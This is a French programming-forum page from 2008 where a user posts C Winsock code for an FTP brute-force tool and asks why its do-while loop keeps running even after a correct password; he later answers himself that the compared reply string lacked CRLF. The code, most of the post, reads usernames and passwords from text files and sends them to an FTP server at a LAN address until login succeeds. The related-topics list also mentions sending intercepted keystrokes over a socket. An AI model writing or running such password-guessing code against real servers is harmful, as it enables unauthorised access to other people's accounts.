begin process at 2010 02 10 14:10:48
  Trouver un code source :

dans

Accueil > Forum > 

C++ & C++ .NET

> 

Windows

> 

Réseau & Internet

> 

probleme avec une boucle do while

Derniers messages déposésPoser une question dans le forum ou lancer une discussion

probleme avec une boucle do while

dimanche 13 juillet 2008 à 17:09:52 | probleme avec une boucle do while

miki42

Bonjour a tous,voila je realise un logiciel de brute force ftp ceci etant pour améliorer mon niveau en programation,bref j'ai un probleme sur ma boucle qui est sensé verifier si le pass et bon ou pas le probleme étant que meme si le pass et bon le programme continu la boucle:

#include <stdio.h>
#include <stdlib.h>
#include<winsock2.h>
#include<string.h>

int main(int argc, char *argv[])
{
char user[200]={0};
char buffer[200]={0};
char pass[200]={0};
char verification[]="530 Login or password incorrect!";
int i;
FILE *pu;
FILE *pp;
pp=fopen("user.txt","r");//ouverture du fichier texte contenant les nom d'utilisateur
fgets(user,sizeof user,pp);//lecture de la première ligne dans le txt et ecriture dans  user
pu=fopen("pass.txt","r");//ouverture du fichier txt contenant les pass

WSADATA WSAData;
WSAStartup(MAKEWORD(2,0), &WSAData);
SOCKET sock;
SOCKADDR_IN sin;

/* Tout est configuré pour se connecter sur IRC, haarlem, Undernet. */
sock = socket(AF_INET, SOCK_STREAM, 0);//creation d'une soket

sin.sin_addr.s_addr   = inet_addr("192.168.1.4");//parametrage de la soket
sin.sin_family    = AF_INET;
sin.sin_port    = htons(21);
connect(sock, (SOCKADDR *)&sin, sizeof(sin));// connection sur l'hote

recv(sock, buffer, sizeof(buffer), 0);//reception des donnees envoyer par le serveur ftp

printf("%s\n",buffer);

do
{

send(sock, user, sizeof(user), 0);//envoie du premier nom d'utilisateur precede de la commande user

for(i=0;i<200;i++)//boucle pour vider le buffer
{
buffer[i]=0;
}

recv(sock, buffer, sizeof(buffer), 0);

fgets(pass,sizeof pass,pu);//lecture  du fichier txt pass

printf("%s\n",pass);

send(sock, pass, sizeof(pass), 0);//envoi du pass celui-ci etant precedé de la commande pass

for(i=0;i<200;i++)//2eme boucle pour vider le buffer
{
buffer[i]=0;
}

recv(sock, buffer, sizeof(buffer), 0);//reception des données envoyer par le serveur

printf("%s\n",buffer);

strcmp(buffer,verification);//comparaison des deux chaines pour savoir si le pass et correct ou non

}while(strcmp(buffer,verification)==0);//si la chaine buffer et egal à la chaine verification on boucle

closesocket(sock);
WSACleanup();

system("PAUSE>0"); 
  return 0;
}
si quelqu'un pouvait me dire pourquoi ma boucle ne s'arrete pas merci d'avance

dimanche 13 juillet 2008 à 19:46:15 | Re : probleme avec une boucle do while

miki42

Réponse acceptée !
Bon je répond moi meme a ma question il semblerai que les commande ftp soit du type CRLF -W il suffisait donc que je rajoute \r\n a la suite de ma chaine contenu dans verification pour que ça marche .

Cette discussion est classée dans : buffer, sin, sock, pass, sizeof

Répondre à ce message

Sujets en rapport avec ce message

Socket en C [ par RM50Man ] WSADATA ws;                    WSAStartup(MAKEWORD(2,0), &ws);              &n client serveur echange de donne [ par bapdur ] voici la version dun client et dun serveur que je fais pour un jeu mais les donnes son envoyer en continu jaimerais aire en sorte que si je tape un ca demande d'aide [ par erb211 ] je veut que quelqu'un me corrige ce programme de chat (client/serveur):================ server.c ================ #include #include #include #include probleme boucles mutliple avec les sockets [ par miki42 ] Bonjour a tous voila j'ai pa le choix,deja une semaine que je mord la langue pour trouver dou vient mon probleme mais rien y fait suit obliger de fari Client / Serveur => Je m'enmèle les pinceaux avec le buffer, les boucles etc. [C] [ par matad0r ] Bonjour, bonjour!J'ai récemment créé une petite application client/serveur de rien du tout (je suis débutant), en m'aidant de ça : http://c.developpez Probleme entre DLL et socket [ par XKaliBur ] Le probleme est que je réalise un hook sur mon clavier et que chaque frappe interceptée je veux l'envoyer via un socket à un serveur, mais des que j'e probleme de send en C avec socket [ par thorn74 ] bonjour je suis actuellement en IUT info et G un  projet a faire mais je bloque je doit fair eun petit programme ou lorsqu'un ordinateur se connecte a Winsock2 et Wifi [ par djin94 ] Bonjour,Je programme sous Visual C++ et je souhaite établir une connection UDP entre deux pc via une liaison Wifi. J'ai essayé avec Winsock2 mais ca n Recuperer contenu requete http [ par fredsor ] Bonjour, Je voudrais me connecter a mon serveur local afin de recuperer le contenu par exemple d'un fichier txt.Grace a un code trouvé sur le site, j' requette [ par baby3378 ] bonjous, voila, j'ai trouvé un code sur ce site qui permet de faire une requette html (port 80) sur un server, sauf que je voudrai savoir comment fair

Nos sponsors

Sondage...

CalendriCode

Février 2010
LMMJVSD
1234567
891011121314
15161718192021
22232425262728

Consulter la suite du CalendriCode

Développement réalisé par Nicolas SOREL (Nix) avec l'aide de : Cyril DURAND et Emmanuel (EBArtSoft), Merci à Vincent pour ses précieux conseils.
CodeS-SourceS.com© Toute reproduction même partielle est interdite sauf accord écrit du Webmaster
CodeS-SourceS.com© est une marque déposée tous droits réservés

Google Coop CodeS-SourceS Google Coop CodeS-SourceS
Temps d'éxécution de la page : 0,655 sec (4)

Nous contacter | Annoncer sur CodeS-SourceS | Mentions légales